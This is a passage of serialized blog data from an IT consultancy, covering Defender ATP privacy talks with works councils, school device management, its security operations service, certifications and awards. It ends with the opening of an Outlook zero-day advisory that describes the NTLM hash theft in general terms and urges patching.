Using sophisticated detection and protection technologies, Microsoft Defender ATP maps known and unknown behaviors (such as writing to a certain point in the registry or trying to access the LSASS process) to data found on the clients and raises alerts as it observes suspicious activity.",[12,3207,3208],{},"For data to be analyzed, Microsoft Defender ATP must collect this data in real-time. It acts like an airplane ‘flight recorder’, which keeps track of important flight data to facilitate the investigation of accidents and incidents.",[12,3210,3211,3212,1013],{},"In some countries, data collection can be a cause for concern. Organizations and roles such as the German Workers Council and Data Protection Officers (DPO) want to know exactly what happens with the data found on an end-user’s computer. One of the main concerns of the Workers Council is that such technologies must ",[251,3213,3214],{},"not be used to analyze user performance",[12,3216,3217],{},"To address these concerns, it’s critical for the Workers Council and Data Protection Officers to understand what user data is being collected, how the user data is being analyzed, and how it’s protected.",[12,3219,3220],{},"In this blog post, we’ll guide you in:",[1254,3222,3223,3226],{},[1257,3224,3225],{},"Directing the conversation around the critical role that Microsoft Defender ATP plays in protecting organizations and why it’s important to deploy",[1257,3227,3228],{},"Providing the Workers Council and Data Protection Officers with definitive information about the data that the service collects",[12,3230,3231],{},"Ultimately, the goal is to equip you with a clear path to address regulation concerns and help organizations see the value of deploying Microsoft Defender ATP.",[12,3233,3234,3235,3238],{},"First: ",[251,3236,3237],{},"be as honest and transparent as possible",". While this should be a general rule for trusted collaboration, it is especially important in this situation. 
From the non-IT side, all these solutions appear to be black holes – completely unknown and very suspicious.",[12,3240,3241],{},"Ensure that the Workers Council understands that modern security platforms, such as Microsoft Defender ATP, do not report on a user’s productivity, working hours, or time spent doing actual work. Help them understand the fact that security / IT teams are not using the data to perform such analyses, so that you can gain their trust.",[12,3243,3244],{},"The lack of transparency and ambiguity can potentially make the black hole experience worse for them, so it’s important that you’re completely honest and clear.",[186,3246,3248],{"id":3247},"role-of-microsoft-defender-atp-in-protecting-organizations","Role of Microsoft Defender ATP in protecting organizations",[12,3250,3251],{},"Explain to them how Microsoft Defender ATP works in a non-IT way. You can use the following examples to convey the critical role that Microsoft Defender ATP plays in protecting organizations and why it’s important to deploy.",[12,3253,3254],{},"Here are two examples:",[12,3256,3257],{},"Microsoft Defender ATP brings two main innovations to improve a company's security posture.",[3259,3260,3261,3264],"ol",{},[1257,3262,3263],{},"In the past, antimalware software was mainly able to detect things it knew. For example, if a piece of malware looked the same as something that was already identified as malicious and detected before - it was clear: it's malware. It was as easy as this. Attackers have evolved over time and new malware appears completely different from one computer to another. For companies, that means they need new solutions with new detection techniques - so-called behavioral analysis. These techniques do not need to know what malware looks like; rather, they look at how it behaves. 
That’s what Microsoft Defender ATP does: it looks at behaviors and raises alerts for suspicious activities.",[1257,3265,3266],{},"One of the biggest entryways into our computers for malware is still vulnerabilities on unpatched systems. Everyone continuously hears: patch your systems and you are good. The problem here is that most companies do not know what software is installed on their clients and the associated vulnerabilities that software has. Microsoft Defender ATP reports on that and tells you exactly how vulnerable the computers are in your organization and what you should patch where.",[12,3268,3269],{},"To reiterate: To be able to provide this analysis and reporting, Microsoft Defender ATP needs to collect the appropriate data.",[12,3271,3272],{},"Presenting this information helps the Workers Council and Data Protection Officers understand how Microsoft Defender ATP works and why it is necessary to collect data.",[186,3274,3276],{"id":3275},"definitive-information-about-the-data-being-collected","Definitive information about the data being collected",[12,3278,3279],{},"The next thing you should explain is the exact data being collected:",[1254,3281,3282,3285,3288,3291,3294,3297,3300,3303,3306,3309],{},[1257,3283,3284],{},"Registry Events",[1257,3286,3287],{},"File Creation Events",[1257,3289,3290],{},"Network Events",[1257,3292,3293],{},"Logon Events",[1257,3295,3296],{},"Installed Application Information",[1257,3298,3299],{},"Machine Information",[1257,3301,3302],{},"Kernel Events",[1257,3304,3305],{},"Memory Events",[1257,3307,3308],{},"Hardware Changes",[1257,3310,3311],{},"System API Calls",[12,3313,3314,3315,1013],{},"More information about compliance can be found ",[2672,3316,3116],{"href":3317,"rel":3318},"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy",[2676],[186,3320,3322],{"id":3321},"actions-that-can-be-taken","Actions that can be taken",[12,3324,3325],{},"To dig deeper into a 
security issue or to respond to it, designated security analysts / security operations members / administrators (depending on their permission) can take the following actions on computers:",[1254,3327,3328,3331,3334,3337,3340],{},[1257,3329,3330],{},"Isolate machine (User gets notified - no connection to the Internet and the local network possible)",[1257,3332,3333],{},"Restrict app execution (only certified apps can run afterwards)",[1257,3335,3336],{},"Trigger an antivirus scan",[1257,3338,3339],{},"Collect an investigation package (collect more data from the client such as a list of all running processes, security event log, etc)",[1257,3341,3342],{},"Initiate a live response session (remote command shell)",[12,3344,3345,3348],{},[251,3346,3347],{},"Important",": Every response action is logged and will be audited in the Action center.",[186,3350,3352],{"id":3351},"data-location-and-retention","Data location and retention",[12,3354,3355],{},"Microsoft Defender ATP data is stored for a maximum of 180 days and can be stored in the United States, United Kingdom, or Europe. The customer organization defines the data storage duration and the data location during the initial setup. Check with your CISO – they usually want to keep the data as long as possible.",[186,3357,3359],{"id":3358},"data-access","Data access",[12,3361,3362],{},"Make it clear that only a dedicated and educated group of security people has access to this data. This group can also be asked to sign a statement that explains that they can only use the data for threat hunting and not for \"employee performance monitoring\" or the like.",[186,3364,3366],{"id":3365},"maintaining-transparency-and-collaboration","Maintaining transparency and collaboration",[12,3368,3369],{},"Another good way to maintain transparency is to continue the communication and collaboration with the Workers Council and Data Protection Officers as soon as Microsoft Defender ATP is deployed. 
Continuously report on security incidents and your response to those incidents. Don’t drop them back into the black hole they feared at the beginning. Keep being transparent and include them to maintain their trust.",[12,3371,3372],{},"Also, there might be other departments in your organization that have the same interests as you – depending on what your role is – team up with the others! Include IT Security, 'Information Security' (or the CISO) and ask them to join meetings around these topics, to have a lively discussion in which all interests of the organization are covered.",[12,3374,3375],{},"Please let us know how your experience with your Data Protection Officers or the Workers Council is or was and share your recommendation to help them overcome their regulatory concerns.",{"title":65,"searchDepth":111,"depth":111,"links":3377},[3378,3379,3380,3381,3382,3383],{"id":3247,"depth":329,"text":3248},{"id":3275,"depth":329,"text":3276},{"id":3321,"depth":329,"text":3322},{"id":3351,"depth":329,"text":3352},{"id":3358,"depth":329,"text":3359},{"id":3365,"depth":329,"text":3366},"The power of Microsoft Defender Advanced Threat Protection (ATP) lies in the intelligent analysis of the data. Using sophisticated detection and protection technologies, Microsoft Defender ATP maps known and unknown behaviors (such as writing to a certain point in the registry or trying to access the LSASS process) to data found on the clients and raises alerts as it observes suspicious activity.",{"lang":2171,"categories":3386,"blogtitlepic":3387,"socialimg":3388,"customExcerpt":3389},[2176],"head-mdatp","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-mdatp.jpg","Microsoft Defender ATP also protects Microsoft 365 users against modern threats. To do this, the data on the end devices must be captured in real-time. This brings works council and data protection officers to the agenda. 
Be as honest and transparent as possible.","2020-03-02","/posts/2020-03-02-mdatp",{"title":3192,"description":3384},"posts/2020-03-02-mdatp",[2176,3395,3396,3397],"Defender","ATP","Microsoft 365","03mqfW_I7hMZ0SPVdEQHOAEFjxZcQlbYidFaU87Zro8",{"id":3400,"title":3401,"author":3402,"body":3403,"cta":2166,"description":3409,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3523,"moment":3527,"navigation":2181,"path":3528,"seo":3529,"stem":3530,"tags":3531,"webcast":2168,"__hash__":3534},"content_en/posts/2020-03-18-modern-workplace-at-school.md","Future Workplace at School",[2331],{"type":9,"value":3404,"toc":3521},[3405,3410,3427,3449,3458,3465,3503,3506,3513],[12,3406,3407],{},[251,3408,3409],{},"Our Future Workplace Client is already used by more than 200,000 users for their daily work, and our customers rely on cloud management and modern working environments. How is the concept actually suitable for schools? Very well indeed - as the Neuffen secondary school shows with its tablet classes. Find out how the Microsoft cloud is revolutionizing digital learning and making device management scalable and flexible at the same time.",[12,3411,3412,3413,3416,3417,3420,3421,3426],{},"Our ",[251,3414,3415],{},"100% cloud strategy"," points the way to the future and says goodbye to maintenance-intensive local or hybrid IT environments. It is precisely this change in strategy that we are presenting to our customers and assisting them in their transition to this new world. In the 2016/2017 school year, the ",[251,3418,3419],{},"Neuffen secondary school"," also faced the question of choosing an administration environment for the new tablet classes: classic on-premises or cloud-based. 
The decision to use Intune - part of the ",[2672,3422,3425],{"href":3423,"rel":3424},"https://www.microsoft.com/en-US/security/business/endpoint-management/microsoft-intune",[2676],"Microsoft Intune"," - was made.",[12,3428,3429,3432,3433,3436,3437,3440,3441,3444,3445,3448],{},[251,3430,3431],{},"A few details about the project in advance:"," In a pilot test lasting a couple of years, the Neuffen secondary school is equipping complete classes with convertible tablets. Started in the school year 2016/2017, a second tablet class followed in 2018/2019 and a third one in this school year (2019/2020). Students in the eighth grade will be given ",[251,3434,3435],{},"their own tablet",", which they can use ",[251,3438,3439],{},"at school and at home"," until they graduate - similar to the mobile devices used by employees in a company. The school consciously decided against a \"suitcase solution\" in which tablets are only used occasionally in certain teaching units. This is the only way that the students ",[251,3442,3443],{},"learn how to use new media in a sustainable way"," and then use them sensibly. Their everyday use also prepares them well for their later professional life. Thanks to the digital pen, handwriting is not neglected and the students continue to use their notebooks - only digitally. Anyone who has forgotten their tablet at home or has not charged it sufficiently can still participate with pen and paper as normal: The tablet serves as a supplement to normal lessons. ",[251,3446,3447],{},"An optimal mix of digital and analogue"," - one of the basics of the tablet concept at the Neuffen secondary school. The Windows 10 operated devices are equipped with various apps and the latest Office applications. E-mail, calendar, Teams, OneDrive and Co. are used for communication and file exchange. Various web-based learning offers and possibilities for collaboration (e.g. whiteboard) round off the classes effectively. 
The first tablet class has already successfully completed its graduation.",[12,3450,3451,3455],{},[2642,3452],{"alt":3453,"src":3454},"Thanks to the digital pen, handwriting is not neglected","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-handschrift.jpg",[3456,3457,3453],"em",{},[12,3459,3460,3461,3464],{},"As mentioned in the beginning, the Neuffen secondary school ",[251,3462,3463],{},"decided to use Intune respectively the Future Workplace concept"," to manage the tablets. With good reason: While companies of comparable size have their own IT departments or employ heavily booked IT consultants, the situation at schools is usually different. Often the IT is in the hands of teachers who look after the school network and the like in addition to normal classes. There is simply a lack of resources to keep highly complex IT systems up and running - this is where the cloud comes in. Managing servers, applying patches and replacing hardware are all a thing of the past. While systems like Intune still need to be designed and managed, you can focus on the essentials and be fully scalable. The time-consuming planning and acquisition of hardware is eliminated.",[12,3466,3467,3470,3471,3476,3477,3482,3483,3488,3489,3492,3493,3496,3497,3502],{},[251,3468,3469],{},"The device management in detail:"," The tablets are put into operation together with the students and teachers. Thanks to ",[2672,3472,3475],{"href":3473,"rel":3474},"https://docs.microsoft.com/en-us/windows/deployment/windows-autopilot/windows-autopilot",[2676],"AutoPilot"," directly in the branding of the school. After a short registration and the setup of ",[2672,3478,3481],{"href":3479,"rel":3480},"https://www.microsoft.com/de-de/security/business/identity/mfa",[2676],"MFA",", the devices get the desired configuration and software or apps. Everything else is configured with various Intune profiles for teaching purposes. 
Thanks to ",[2672,3484,3487],{"href":3485,"rel":3486},"https://products.office.com/de-de/business/office",[2676],"Office 365"," in the background, users have direct access to various services such as ",[251,3490,3491],{},"Exchange Online, OneDrive for Business, the office applications and Teams",". To ensure seamless operation, ",[251,3494,3495],{},"Azure AD, Windows Update for Business, Windows Hello, Delivery Optimization, Windows Defender and others"," also work under the hood. In a very short time, the devices are ready for use in the classroom. From now on the tablets can be updated and maintained centrally. Further complex software packages are installed thanks to ",[2672,3498,3501],{"href":3499,"rel":3500},"https://realmjoin.com/",[2676],"Glück and Kanja's RealmJoin",". Support can also be easily provided by means of our integrated LAPS and remote maintenance solution.",[12,3504,3505],{},"The school has already recognised that this concept has even more potential. Now the normal school network with the pool rooms and all other clients will be onboarded to the new administration. 
Thanks to the almost infinite scalability of Microsoft Endpoint Management, there is no limit to what can be done.",[12,3507,3508,3509,3512],{},"As part of the school's closure to curb the proliferation of COVID-19, students in the tablet classes will receive ",[251,3510,3511],{},"remote teaching with Microsoft Teams"," in specific subjects through videoconferencing, document sharing, and assignment delivery.",[12,3514,3515,3519],{},[2642,3516],{"alt":3517,"src":3518},"Teaching unit in mathematics","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-teams-unterricht.jpg",[3456,3520,3517],{},{"title":65,"searchDepth":111,"depth":111,"links":3522},[],{"lang":2171,"categories":3524,"blogtitlepic":3525,"socialimg":3526,"customExcerpt":3409},[2810],"head-future-workplace-at-school","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-future-workplace-at-school.jpg","2020-03-20","/posts/2020-03-18-modern-workplace-at-school",{"title":3401,"description":3409},"posts/2020-03-18-modern-workplace-at-school",[2810,2824,2677,3532,2677,2824,3533],"Teams","Collaboration","V7qrGpM2QRvbz8KnvAL0d2a8SYzE8FZVlsNmvTyeQt4",{"id":3536,"title":3537,"author":2209,"body":3538,"cta":2166,"description":3544,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3651,"moment":3655,"navigation":2181,"path":3656,"seo":3657,"stem":3658,"tags":3659,"webcast":2168,"__hash__":3662},"content_en/posts/2020-05-18-anniversary-csoc.md","First anniversary of the Cloud Security Operations Center",{"type":9,"value":3539,"toc":3645},[3540,3545,3548,3559,3562,3569,3572,3576,3583,3587,3594,3598,3605,3611,3618,3625,3631,3638,3642],[12,3541,3542],{},[251,3543,3544],{},"The Modern Workplace Client requires modern security solutions. Microsoft provides first-class tools that provide all the information needed to respond quickly to threats. However, many companies do not have the time to study these instruments in depth, let alone the manpower to monitor them continuously. 
That's why we launched our Managed Service Cloud Security Operations Center (CSOC) a year and a half ago. Time for a bottom line.",[12,3546,3547],{},"The CIO of a large company said in front of me that he had bought a fitness bike for Christmas and put it in the basement. The only problem is that he never goes to the basement.",[12,3549,3550,3551,3554,3555,3558],{},"In our ",[251,3552,3553],{},"100% Cloud projects"," we can convince our customers that a Modern Workplace client needs ",[251,3556,3557],{},"modern security solutions",". Microsoft combines these cloud security tools in the 'E5 Security' license. The use of these tools is beyond question for most customers, so that the modern workplace, cloud services, data and identities are equally well protected from any location.",[12,3560,3561],{},"However, after an initial enthusiasm about what can be discovered with these security tools, disillusionment quickly follows, as many employees in companies usually lack the time to study these tools in depth, not to mention the lack of manpower to constantly monitor them. This is quite understandable, as almost all IT departments I know are typically overloaded. And yet the fitness bike in the basement only serves its purpose when it is in use.",[12,3563,3564,3565,3568],{},"With this in mind, we started designing the architecture for our ",[251,3566,3567],{},"Managed Service 'Cloud Security Operations Center (CSOC)'"," about a year and a half ago. Because we realized that over time, more and more customers are turning to modern cloud security, but need support.",[12,3570,3571],{},"Among other things, we build on the following precepts:",[186,3573,3575],{"id":3574},"_1-microsoft-native","1. Microsoft Native",[12,3577,3578,3579,3582],{},"Those who have studied the cloud know that change is its middle name. 
This is especially important in the context of security, in order to be able to constantly meet new threats, but it can also mean that connectors and custom software have to be regularly adapted. Here we rely on ",[251,3580,3581],{},"native Microsoft solutions"," and are in constant, close contact with the respective product groups in Israel and Redmond. We provide continuous feedback and thus have direct influence on product development - which in turn benefits our customers.",[186,3584,3586],{"id":3585},"_2-no-man-is-an-island","2. No Man Is an Island",[12,3588,3589,3590,3593],{},"Our customers benefit from the knowledge gained in other customer environments. For example, if we discover a new method of attack, we develop special ",[251,3591,3592],{},"hunting queries"," for it, which we then use in all environments.",[186,3595,3597],{"id":3596},"_3-creating-more-customer-value","3. Creating More Customer Value",[12,3599,3600,3601,3604],{},"Everything we report to our customers must create more value for them. The customer doesn't have time to read many pages of security reports. Instead, we focus on ",[251,3602,3603],{},"one-page reports"," that are suitable for the management and discuss them in detail:",[12,3606,3607],{},[2642,3608],{"alt":3609,"src":3610},"CSOC Report","https://res.cloudinary.com/c4a8/image/upload/illus/img-csoc-report.jpg",[12,3612,3613,3614,3617],{},"This approach has developed into ",[251,3615,3616],{},"intensive cooperation"," between the CSOC of Glück & Kanja and the SecOps departments of our customers. Every month we discuss incidents and possible improvements. And we also support the implementation of these suggested improvements. That is the key!",[12,3619,3620,3621,3624],{},"In the meantime, we successfully apply these guidelines to several customers every day. During this time we have ",[251,3622,3623],{},"prevented or interrupted"," numerous attacks. 
We have analyzed assaults forensically and drawn conclusions on how to prevent them in the future. In the process, we have developed tools and procedures that help all our customers.",[12,3626,3627,3628,1013],{},"The daily work consists on the one hand of routine tasks and on the other hand of exciting research in case of attacks by hacker groups. As soon as an interesting case comes up, several specialists put their heads together to reconstruct what happened. We try to reduce the monotonous tasks by constantly improving our processes and automation. Our own service is also lived ",[251,3629,3630],{},"evergreen",[12,3632,3633,3634,3637],{},"In addition to incident response and incident analysis for malware, phishing and identity attacks, we have significantly improved the ",[251,3635,3636],{},"Security Posture"," of our CSOC customers. For example, we were able to increase the Microsoft Secure Score at one customer to 169% within 3 months and thus greatly optimize his security landscape.",[41,3639,3641],{"id":3640},"prospects","Prospects",[12,3643,3644],{},"As already mentioned: safe is not safe. That is why we are in the process of extending the services of the CSOC to other areas, for example to the Azure Security Center. We are also constantly questioning the alerts and sensors that are monitored on a daily basis and are prepared to adapt them if necessary. 
This allows us to keep our service 'new' and 'fresh' to be perfectly prepared for unknown threats.",{"title":65,"searchDepth":111,"depth":111,"links":3646},[3647,3648,3649,3650],{"id":3574,"depth":329,"text":3575},{"id":3585,"depth":329,"text":3586},{"id":3596,"depth":329,"text":3597},{"id":3640,"depth":111,"text":3641},{"lang":2171,"categories":3652,"blogtitlepic":3653,"socialimg":3654,"customExcerpt":3544},[2176],"head-csoc-celebration","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-csoc-celebration.jpg","2020-05-18","/posts/2020-05-18-anniversary-csoc",{"title":3537,"description":3544},"posts/2020-05-18-anniversary-csoc",[2176,3660,3661],"CSOC","Cloud","idhk6vSC_A8SOPu8bvEIt2zcrM0rB-SYiIqcYuvulqs",{"id":3664,"title":3665,"author":2461,"body":3666,"cta":2166,"description":3672,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3726,"moment":3731,"navigation":2181,"path":3732,"seo":3733,"stem":3734,"tags":3735,"webcast":2168,"__hash__":3736},"content_en/posts/2020-07-13-gk-microsoft-partner-of-the-year.md","Glueck & Kanja is Microsoft Partner of the Year Finalist Security",{"type":9,"value":3667,"toc":3724},[3668,3673,3683,3689,3698,3704,3715,3718],[12,3669,3670],{},[251,3671,3672],{},"Glueck & Kanja Consulting AG is recognized as Microsoft Partner of the Year Finalist 'Security and Compliance'.",[12,3674,3675,3676,3679,3680,1013],{},"Microsoft today announced that Glueck & Kanja Consulting AG, one of the leading IT consulting companies and one of the Top Microsoft Partners in Germany, has been selected as ",[251,3677,3678],{},"Finalist for the Microsoft Partner of the Year Award 2020 in the category 'Security and Compliance'",". After 2017 and 2019, the company was once again able to compete against a strong field of participants among the worldwide Microsoft partners. 
These are the best prerequisites for the recently announced merger with GAB to form the Cloud Managed Service Provider ",[251,3681,3682],{},"glueckkanja AG",[12,3684,3685],{},[2642,3686],{"alt":3687,"src":3688},"Microsoft Partner of the Year Award 2020 Finalist","https://res.cloudinary.com/c4a8/image/upload/logos/ms-logo-2020POYFinalist.png",[12,3690,3691,3692,3697],{},"Christian Kanja, CEO of Glueck & Kanja, is glad about the repeated award from Redmond: \"We are very happy that our ",[2672,3693,3696],{"href":3694,"rel":3695},"https://glueckkanja.com/de/portfolio/cloud-security-operations-center/",[2676],"Cloud Security Operations Center (CSOC)"," convinced the Microsoft jury. With our 100 % Cloud Blueprint architecture combined with the extensive Microsoft E5 security stack, we can not only provide a cloud-managed workplace, but also provide it with an always up-to-date and seamless cloud security strategy\".",[12,3699,399,3700,3703],{},[251,3701,3702],{},"CSOC Managed Service"," delivers multi-tenant analyses and guarantees fast 24x7 response times for all types of security incidents through its proprietary Companion components developed by Glueck & Kanja based on the Microsoft Graph API. The international energy company UNIPER, among others, chose this service for its almost 12,000 Windows 10 Modern Workplace Clients and the security of Azure AD Identity Protection, Office ATP, Defender ATP, TVM and MCAS.",[12,3705,3706,3707,3710,3711,3714],{},"In addition to regular threats, an unexpected ",[251,3708,3709],{},"challenge for the CSOC service"," occurred as COVID-19 continued to spread. Most of UNIPER's 12,000 workstations now operate remotely, and the protection provided by Microsoft 365 security tools would have been impossible in traditional infrastructures. \"In this time of the ",[251,3712,3713],{},"COVID-19 pandemic",", we need to ensure the security of our entire Microsoft 365 infrastructure and workstations. 
That's why we appreciate even more the support provided by the Cloud Security Operations Center of Glueck & Kanja. It offers continuous monitoring of overall security, handling cyber threats and continuously brings in sustainable improvements,\" says Tilmann Proske, Head of Enterprise Information Security at UNIPER.",[12,3716,3717],{},"\"We are honored to recognize the winners and finalists of the 2020 Microsoft Partner of the Year Awards,\" said Gavriella Schuster, Corporate Vice President, One Commercial Partner, Microsoft.",[12,3719,399,3720,3723],{},[251,3721,3722],{},"Microsoft Partner of the Year Award"," is given annually to Microsoft partners who have proven themselves with innovative and particularly successful solutions and projects.",{"title":65,"searchDepth":111,"depth":111,"links":3725},[],{"lang":2171,"categories":3727,"blogtitlepic":3728,"socialimg":3729,"customExcerpt":3730},[2962],"head-csoc-discussion","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-csoc-discussion.jpg","Microsoft announced that the Glueck & Kanja Consulting AG is finalist for the Microsoft Partner of the Year Award 2020 in the category 'Security and Compliance'. 
The company has convinced the Microsoft jury with its Cloud Security Operations Center.","2020-07-13 02:00:00 +0200","/posts/2020-07-13-gk-microsoft-partner-of-the-year",{"title":3665,"description":3672},"posts/2020-07-13-gk-microsoft-partner-of-the-year",[2972,2973,2971],"tWU2UJO3RjSQNMN6JGkf_GvayZq4Wc_SL3vARN9UbfI",{"id":3738,"title":3739,"author":3740,"body":3741,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3793,"moment":3798,"navigation":2181,"path":3799,"seo":3800,"stem":3801,"tags":3802,"webcast":2168,"__hash__":3806},"content_en/posts/2022-01-19-we-are-certified.md","Successfully ISO 27001 certified - in only 10 months",[2380],{"type":9,"value":3742,"toc":3788},[3743,3747,3750,3753,3757,3760,3763,3766,3775,3778,3782,3785],[41,3744,3746],{"id":3745},"what-is-iso-27001-certification-about","What is ISO 27001 certification about?",[12,3748,3749],{},"An information security management system, or ISMS for short, is less concerned with technology than with describing rules and organizational measures for holistic corporate and IT security management. The implementation is in turn based on technical and organizational rules in the previously defined areas (in our case: managed services and product development).",[12,3751,3752],{},"Our goal was to be ISO 27001 certified in the above-mentioned areas by the end of 2021 - in just 10 months! For this, we were ridiculed from various sides, because the introduction of an ISMS and the certification mean a significant amount of time.",[41,3754,3756],{"id":3755},"what-kind-of-implementation-did-we-choose","What kind of implementation did we choose?",[12,3758,3759],{},"As a company, we think a little differently. We didn't want to reinvent the wheel, but rather rely on people who see accompanying such a process as their core competence. 
That's why we chose an \"off-the-shelf\" system, where the framework was already given and we just had to fill it with life.",[12,3761,3762],{},"As already mentioned, the implementation is based on technical and organizational rules. This is where our 100% cloud strategy and our Future Workplace Blueprint play into our hands. Because one of our maxims is to \"eat your own dog food\". We therefore live in the cloud and the Blueprint is also being implemented within our company. Thus, many of the topics required in the framework could be referenced to the Blueprint or requirements could be answered with it.",[12,3764,3765],{},"The ISMS also takes a look at the area of corporate security. Among other things, it examines how business-critical situations are handled, e.g. power or internet outages. In our case, there were some exciting discussions with the auditor during the certification process, as these topics do not directly affect us. After all, thanks to our 100% cloud approach, our motto is: \"Power gone, no matter - then I go where the power is. No internet, never mind - personal hotspot on mobile, off to the café around the corner or, boringly, home office.\"",[12,3767,3768,3769,3774],{},"ISO 27001 certification also includes an assessment of the business facilities and infrastructure (data center). This might take up to an entire day. In our case, the assessment was completed within an hour. Why? Quite simple: 100% cloud. And since we use the Microsoft Cloud, ",[2672,3770,3773],{"href":3771,"rel":3772},"https://docs.microsoft.com/de-de/compliance/regulatory/offering-iso-27001",[2676],"which is already ISO 27001 certified",", this point was quickly taken care of as well.",[12,3776,3777],{},"However, this raised further questions. If all the infrastructure is in the cloud, how is access secured and access monitored? We were again able to refer to our Blueprint, which also addresses the issue of conditional access. 
In terms of monitoring, we convinced with our glueckkanja CSOC service and eliminated the last doubts. Thus, we were ready for the final certification.",[41,3779,3781],{"id":3780},"so-what-conclusion-can-we-draw","So what conclusion can we draw?",[12,3783,3784],{},"With our technical knowledge, which we put into our Blueprint, we also created the basis to convince on the organizational side. This enabled us to achieve ISO 27001 certification in a very short time and with manageable effort.",[12,3786,3787],{},"From now on, we can tick questions about an ISMS or certification with a clear conscience when we receive inquiries about managed services. And you as a customer can also benefit from our 100% cloud approach, because the standardized approach can also help you in your company with issues such as information and business security.",{"title":65,"searchDepth":111,"depth":111,"links":3789},[3790,3791,3792],{"id":3745,"depth":111,"text":3746},{"id":3755,"depth":111,"text":3756},{"id":3780,"depth":111,"text":3781},{"lang":2171,"categories":3794,"blogtitlepic":3795,"socialimg":3796,"customExcerpt":3797},[2962],"head-iso-27001","blog/heads/head-iso-27001.jpg","We prove to our customers every day on a technical level that we offer them first-class support as a cloud managed service provider; now it was time to check whether the organizational requirements were also met. At glueckkanja, we are receiving more and more requests from customers who want proof that our company has established industry-standard processes for information security. 
To meet this requirement, we have had ourselves certified in accordance with ISO 27001.","2022-01-19","/posts/2022-01-19-we-are-certified",{"title":3739,"description":65},"posts/2022-01-19-we-are-certified",[2962,2176,3803,3804,3805],"ISO 27001","Information Security","Certification","G__HQduXLbLco09kcLMsCghM7PWXCuT6hEu8yuzkOpY",{"id":3808,"title":3809,"author":3810,"body":3811,"cta":2166,"description":3815,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3831,"moment":3838,"navigation":2181,"path":3839,"seo":3840,"stem":3841,"tags":3842,"webcast":2168,"__hash__":3844},"content_en/posts/2022-10-18-csoc-managed-xdr-solution.md","glueckkanja recognized with Microsoft verified MXDR solution status",[2461],{"type":9,"value":3812,"toc":3829},[3813,3816,3823,3826],[12,3814,3815],{},"Yeah! As one of currently only three partners worldwide, glueckkanja has received Microsoft Verified Managed Extended Detection and Response (MXDR) solution status. This award is the best proof of our reliable MXDR services offering, including our Security Operation Center (SOC) with 24/7/365 proactive hunting, monitoring and response capabilities all built on tight integrations with the Microsoft Security platform. This solution combines expert-trained technology with human-led services and has been verified by Microsoft engineers.",[3817,3818],"v-img",{":img":3819,":alt":3820,":cloudinary":3821,"img-src-sets":3822},"quote.img","quote.alt","true","quote",[12,3824,3825],{},"\"With malicious attacks on the rise, we understand security is front and center for our customers. That is why I am excited to congratulate glueckkanja on achieving Microsoft Verified: Managed Extended Detection and Response solution status. 
Their solution closely integrates with Microsoft 365 Defender and Microsoft Sentinel and has been verified by Microsoft Security engineering to ensure that it provides comprehensive service coverage across the Microsoft Security portfolio.\" – Rob Lefferts, Corporate Vice President, Threat Protection, Microsoft",[12,3827,3828],{},"glueckkanja AG is part of the Microsoft Intelligent Security Association (MISA). “The Microsoft Intelligent Security Association is comprised of some of the most reliable and trusted security companies across the globe”, said Maria Thomson, Microsoft Intelligent Security Association Lead. “Our members share Microsoft’s commitment to collaboration within the cybersecurity community to improve our customers’ ability to predict, detect, and respond to security threats faster. We’re thrilled to recognize and welcome glueckkanja's MXDR solution to the MISA portfolio.”",{"title":65,"searchDepth":111,"depth":111,"links":3830},[],{"lang":2171,"categories":3832,"blogtitlepic":3833,"socialimg":3834,"customExcerpt":3835,"quote":3836},[2176],"head-mxdr-verification","/blog/heads/head-mxdr-verification.jpg","glueckkanja has achieved Microsoft verified Managed Extended Detection and Response (MXDR) solution status. 
By achieving this status, we have proven our robust MXDR services including our Security Operation Center (SOC) with 24/7/365 proactive hunting, monitoring, and response capabilities all built on tight integrations with the Microsoft Security platform.",{"img":3837,"alt":2209},"/blog/pics/quote-jan-geisbauer-en.png","2022-10-18","/posts/2022-10-18-csoc-managed-xdr-solution",{"title":3809,"description":3815},"posts/2022-10-18-csoc-managed-xdr-solution",[2176,3660,3843],"MXDR","l20KyU3wpz4DAUMsjlctx1FouLVgp4HFxIS4CITPJkk",{"id":3846,"title":3847,"author":3848,"body":3849,"cta":2166,"description":3853,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4019,"moment":4024,"navigation":2181,"path":4025,"seo":4026,"stem":4027,"tags":4028,"webcast":2168,"__hash__":4030},"content_en/posts/2023-03-16-outlook-vulnerability.md","Zero-Day Exploit in Outlook enables theft of Net-NTLMv2 hash",[2302,2494],{"type":9,"value":3850,"toc":4016},[3851,3854,3857,3865,3868,3875,3882,3889,3896,3899,3906,3914,3917,3926,3929,3985,3990,3994],[12,3852,3853],{},"Microsoft has confirmed on Tuesday that a critical Outlook security vulnerability, rated 9.8 out of a maximum of 10 points, is already being exploited in the wild (Zero-Day). What's dangerous about this exploit is that it executes as soon as a malicious email is delivered to Outlook. The email does not need to be opened to exploit the vulnerability, so no additional user activity is required. With a manipulated email, an attacker can specifically target a server under their control and thereby capture the Net-NTLMv2 hash of the logged-in user. The stolen information can then be used for further attacks against the user's on-premises infrastructure.",[12,3855,3856],{},"The most important measure to address this exploit is to immediately update the Office package. 
